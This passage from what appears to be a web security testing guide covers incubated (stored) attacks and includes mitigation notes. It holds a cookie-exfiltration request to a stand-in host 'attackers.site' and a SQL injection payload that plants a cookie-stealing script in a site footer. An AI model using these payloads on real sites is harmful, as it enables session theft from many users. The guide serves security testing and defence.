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Testing for Incubated Vulnerability
Also often referred to as persistent attacks, incubated testing is a complex testing method that needs more than one data validation vulnerability to work. Incubated vulnerabilities are typically used to conduct “watering hole” attacks against users of legitimate web applications.
Incubated vulnerabilities have the following characteristics:
- The attack vector needs to be persisted in the first place, it needs to be stored in the persistence layer, and this would only occur if weak data validation was present or the data arrived into the system via another channel such as an admin console or directly via a backend batch process.
- Secondly, once the attack vector was “recalled” the vector would need to be executed successfully. For example, an incubated XSS attack would require weak output validation so the script would be delivered to the client in its executable form.
Exploitation of some vulnerabilities, or even functional features of a web application, will allow an attacker to plant a piece of data that will later be retrieved by an unsuspecting user or other component of the system, exploiting some vulnerability there.
In a penetration test,
incubated attacks can be used to assess the criticality of certain bugs, using the particular security issue found to build a client-side based attack that usually will be used to target a large number of victims at the same time (i.e. all users browsing the site).
This type of asynchronous attack covers a great spectrum of attack vectors, among them the following:
- File upload components in a web application, allowing the attacker to upload corrupted media files (JPEG images exploiting
CVE-2004-0200, PNG images exploiting
CVE-2004-0597, executable files, site pages with active component, etc.)
- Misconfigured servers allowing installation of Java packages or similar web site components (i.e. Tomcat, or web hosting consoles such as Plesk, CPanel, Helm, etc.)
How to Test
File Upload Example
Verify the content type allowed to upload to the web application and the resultant URL for the uploaded file. Upload a file that will exploit a component in the local user workstation when viewed or downloaded by the user. Send your victim an email or other kind of alert in order to lead him/her to browse the page. The expected result is the exploit will be triggered when the user browses the resultant page or downloads and executes the file from the trusted site.
XSS Example on a Bulletin Board
Direct users to browse the vulnerable page or wait for the users to browse it. Have a “listener” at
attackers.sitehost listening for all incoming connections.
When users browse the vulnerable page, a request containing their cookie (
document.cookieis included as part of the requested URL) will be sent to the
attackers.sitehost, such as:
GET /cv.jpg?SignOn=COOKIEVALUE1;%20ASPSESSIONID=ROGUEIDVALUE; HTTP/1.1
SQL Injection Example
Usually, this set of examples leverages XSS attacks by exploiting a SQL-injection vulnerability. The first thing to test is whether the target site has a SQL injection vulnerability. This is described in Testing for SQL Injection. For each SQL-injection vulnerability, there is an underlying set of constraints describing the kind of queries that the attacker/pen-tester is allowed to do.
The tester then has to match the XSS attacks he has devised with the entries that he is allowed to insert.
In a similar fashion as in the previous XSS example, use a web page field vulnerable to SQL injection issues to change a value in the database that would be used by the application as input to be shown at the site without proper filtering (this would be a combination of an SQL injection and a XSS issue). For instance, let’s suppose there is a
footertable at the database with all footers for the web site pages, including a
noticefield at the
footertable in the database.
SELECT field1, field2, field3` FROM table_x WHERE field2 = 'x'; UPDATE footer SET notice = 'Copyright 1999-2030%20 <script>document.write(\'<img src="http://attackers.site/cv.jpg?\'+document.cookie+\'">\')</script>' WHERE notice = 'Copyright 1999-2030';
Now, each user browsing the site will silently send his cookies to the
attackers.site(steps b.2 to b.4).
Some web servers present an administration interface that may allow an attacker to upload active components of her choice to the site. This could be the case with an Apache Tomcat server that doesn’t enforce strong credentials to access its Web Application Manager (or if the pen testers have been able to obtain valid credentials for the administration module by other means).
In this case, a WAR file can be uploaded and a new web application deployed at the site, which will not only allow the pen tester to execute code of her choice locally at the server, but also to plant an application at the trusted site, which the site regular users can then access (most probably with a higher degree of trust than when accessing a different site).
As should also be obvious, the ability to change web page contents at the server, via any vulnerabilities that may be exploitable at the host which will give the attacker webroot write permissions, will also be useful towards planting such an incubated attack on the web server pages (actually, this is a known infection-spread method for some web server worms).
Gray-box or white-box testing techniques will be the same as previously discussed.
- Examining input validation is key in mitigating against this vulnerability. If other systems in the enterprise use the same persistence layer they may have weak input validation and the data may be persisted via a
- To combat the
back doorissue for client-side attacks, output validation must also be employed so tainted data shall be encoded prior to displaying to the client, and hence not execute.
Most of the references from the Cross-site scripting section are valid. As explained above, incubated attacks are executed when combining exploits such as XSS or SQL-injection attacks.
- CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests
- Blackboard Academic Suite 6.2.23 +/-: Persistent cross-site scripting vulnerability